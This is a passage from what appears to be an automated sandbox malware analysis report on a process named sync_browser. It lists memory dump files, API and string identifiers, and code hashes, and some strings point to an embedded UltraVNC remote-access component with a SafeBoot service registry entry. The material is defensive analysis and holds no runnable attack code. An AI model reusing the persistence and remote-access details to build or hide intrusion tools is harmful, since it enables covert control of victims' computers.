                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
                                                                      • String ID: VncEvent
                                                                      • API String ID: 2428488660-2681191898
                                                                      • Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                      • Instruction ID: 741e80d9c7f19a776e0cb444c5d83ce28240ec347c0870d8f285a77855b65c36
                                                                      • Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
                                                                      • Instruction Fuzzy Hash: A8118620F0C64E42FB65BB31BA7877D9291AF89F85F886032D90E86654EE3C94448732
                                                                      Function 00007FF7E50DC970 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                                      • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                                      • API String ID: 3015439405-2946900448
                                                                      • Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                      • Instruction ID: 747768075b774ac4a0e062906af0bc2101245b70bd720dcaa461dc92e9c17d81
                                                                      • Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                      • Instruction Fuzzy Hash: 8E214C76914B8A81EB10EF24F8642A873A4FB04F09F845136CE5D97368EF7CD558C762
                                                                      Function 00007FF7E513D304 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 101574016-0
                                                                      • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                      • Instruction ID: b5bf741bbd763da0366ec58b36f8919d9485c8406a5cfaa794dfc8d2abcc82c7
                                                                      • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                      • Instruction Fuzzy Hash: 6CA1A062E0974A81FA11BB15B930779A294AF40FD4F868536DD5D8BB8DDF3CE8418322
                                                                      Function 00007FF7E5138A7C Relevance: 16.6, APIs: 11, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                                      • String ID:
                                                                      • API String ID: 3219262609-0
                                                                      • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                      • Instruction ID: e8df9e513a76513a5fd79b32715d06061281f24ece9ef9460cbf1d838b4819d3
                                                                      • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                      • Instruction Fuzzy Hash: 8831A061A0E28B95FA51BB61747037DA190AF45F90F994433E95EC7BCEEE3CA4018322
                                                                      Function 00007FF7E509D930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                      • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                      • API String ID: 173432231-678763868
                                                                      • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                      • Instruction ID: 517bd0a940e9050cb91481739263b9e17871deac419213723aa8336020dcba2b
                                                                      • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                      • Instruction Fuzzy Hash: C5412132619B45A2E748EB24F9503E9B3A8FB44B54F800136D7AD83794DF7CA4B5C712
                                                                      Function 00007FF7E5076A20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 78registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                      • API String ID: 3677997916-356703426
                                                                      • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                      • Instruction ID: 6aaf2c8f6f34ef66aef31583951b4eb36e827eb03b82efdafbab9690856cc9ca
                                                                      • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                      • Instruction Fuzzy Hash: 14415131A1864B81EB20AB25F4603BAB3A0FB45B88FC01033EA4EC655DEF3CD555CB61
                                                                      Function 00007FF7E50768F0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 62registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                      • API String ID: 3677997916-1370392681
                                                                      • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                      • Instruction ID: 5a05037cd1d2859f57672c62f22b79ec1982cc117f54915ed71e2b5c7440a51d
                                                                      • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                      • Instruction Fuzzy Hash: D1314071A1864B81FB10AB21F4647BAB364FB45B48FC01133EA8EC65ADEF3CD5058B51
                                                                      Function 00007FF7E50A07C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 60windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                                      • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                                      • API String ID: 554953491-3667255696
                                                                      • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                      • Instruction ID: ff7600217329646bbfb0647047b7fd5e36acb99f42d7eeff091c45e8104a3e6e
                                                                      • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                      • Instruction Fuzzy Hash: 5C31E835608A8A95EB10EF65E4606E9B360FB44F44FC44437E94D87A59EF38E105C772
                                                                      Function 00007FF7E5083110 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                                      • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                                      • API String ID: 913464532-2910635102
                                                                      • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                      • Instruction ID: bee799b71d4df8fb3bdfd4291681cc752a10811c1a1f1c47226f613fb29ec43c
                                                                      • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                      • Instruction Fuzzy Hash: 29217175A08B8A82EB60EB10F46576AB360FB85B58F800136E68C83B6CDF7DD145CF11
                                                                      Function 00007FF7E50A3170 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 48threadsynchronizationwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF7E50A3246
                                                                      • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF7E50A31DE
                                                                      • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF7E50A319A
                                                                      • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF7E50A321D
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
                                                                      • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                                      • API String ID: 803186428-2751095142
                                                                      • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                      • Instruction ID: f9c88cbdc0b76c9e1a5d43cfc1dbbbbb0004cdb9d59d657f7fac8e982631e9e4
                                                                      • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                      • Instruction Fuzzy Hash: 8B213B229145CA86F310AB35E4647F96369FB88F05FC81433D90E9A169DF3C9895C372
                                                                      Function 00007FF7E51359D8 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135A72
                                                                      • malloc.LIBCMT ref: 00007FF7E5135ADB
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135B0F
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135B36
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135B7E
                                                                      • malloc.LIBCMT ref: 00007FF7E5135BDB
                                                                        • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
                                                                        • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
                                                                        • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135C10
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7E5135D15), ref: 00007FF7E5135C50
                                                                      • free.LIBCMT ref: 00007FF7E5135C64
                                                                      • free.LIBCMT ref: 00007FF7E5135C75
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                      • String ID:
                                                                      • API String ID: 1080698880-0
                                                                      • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                      • Instruction ID: 3ae88dde818af18b8499eb55dc31008a15cb3e5be271c3ac373eeb99504363de
                                                                      • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                      • Instruction Fuzzy Hash: 9B81D732A0974A86EB20AF15A4A0369F7D5FF44FA4F964636DA1D837D8DF3CD5008721
                                                                      Function 00007FF7E50969D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
